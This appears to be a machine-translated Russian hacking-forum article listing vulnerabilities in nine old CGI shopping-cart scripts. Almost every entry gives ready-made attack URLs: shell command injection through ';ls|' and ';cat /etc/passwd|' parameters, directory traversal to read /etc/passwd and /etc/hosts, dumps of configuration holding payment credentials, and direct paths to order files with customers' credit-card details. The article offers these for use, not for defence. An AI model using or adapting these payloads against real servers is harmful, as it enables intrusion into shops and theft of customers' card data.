special

  1. HOME
  2. Хакерство и защита
  3. Хакер (от англ. hack — разрубать)
  4. Уязвимости торговых площадок

This webpage has been robot translated, sorry for typos if any. To view the original content of the page, simply replace the translation subdomain with www in the address bar or use this link.

Уязвимости торговых площадок

 

Продолжаем наше изучение багов популярных в недалеком прошлом торговых тележках.
В этот раз мы в начале расмотрим тележки которые позволяли выполнять произвольные команды, а после и другие вкусности.

№ 1-м у нас пойдет (e)shop Online-Shop System от Webdiscount.net

скрипт не фильтрует символы конвеера(;) и пейапа (|):
www.xxx.com/cgi-bin/eshop.pl?seite=;ls|

№ 2 Hassan Consulting's Shoping cart [shop.cgi]от Hassan Consulting.

то же самое:
www.xxx.com/cgi-local/shop.pl/page=|ls|
www.xxx.com/cgi-local/shop.pl/page=;ls|

к сожалению в версиях 4 и выше Hassan Consulting's Shoping cart этот баг уже отсутсвует, но есть другая проблема, при запросе www.xxx.com/cgi-local/shop.pl можно узнать версию торговой тележки и путь до скрипта.

№ 3 ShopPlus Cart

то же самое, отсутсвует проверка на вводимые символы:
www.xxx.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
www.xxx.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|

№ 4 multi-shop 1.06

Вместо template файла можно указать любую команду.
www.xxx.com/cgi-bin/mshop2?product_template=;ls|&show_items=1&config_file= picodirect.co.uk_mshop2.conf&user_notebooks=note_envoy

№ 5 WebCart от Mountain Network Systems

выполняем удаленные команды:
www.xxx.com/cgi-bin/webcart.cgi?CONFIG=moutain&CHANGE=YESNEXTPAGE=;ls|&CODE=PHOLD

Далее расматриваем другие уязвимости

№ 6 Dansie Shopping Cart 3.04 Multiple Vulnerabilities

Добавление в конец определенных переменных и значений к http://target/cgi-bin/cart.pl?
позволит отдаленным пользователям исполнять некоторые действия. "Vars" отобразит параметры
настройки конфигурации приложения, которое включает имя пользователя и пароль, используемый
для сделок кредитной карточки. Параметры настройки Окружающей среды могут быть получены,
используя "env".
Строка "db" перечислит полный файл базы данных, содержащий все предметы в shopping cart.
www.xxx.com/cgi-bin/cart.pl?vars
www.xxx.com/cgi-bin/cart.pl?env
www.xxx.com/cgi-bin/cart.pl?db

№ 7 ShopCartCGI v 2.3

изъян позволяет удаленному пользователю просматривать файлы на сервере:
www.xxx.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd
www.xxx.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd

№ 8 QuikStore Shopping Cart

Удаленный пользователь может просматривать файлы на системе:
www.xxx.com/quikstore.cgi?blah&template=../../. ./../../../../../../../etc/passwd%00.html
www.xxx.com/quikstore.cgi?blah&template=../../../../../../../../../../../../etc/hosts
www.xxx.com/quikstore.cgi?blah&t emplate=../../../../../../../../../../../../usr/bin/id|

№ 9 DCShop Electronic Shopping Cart

Целый набор багов:
www.xxx.com/cgi-bin/DCShop/Orders/orders.txt - информация о кредитках в старых версиях тележки просматривалась так.
www.xxx.com/cgi-bin/DCShop/dcshop_admin.cgi?action=view_orders - выдает инфу о кредитках в некоторых новых версиях.

Твой bug Durito.
_________________
EAT THE RICH!

Дата створення/оновлення: 25.05.2018

';>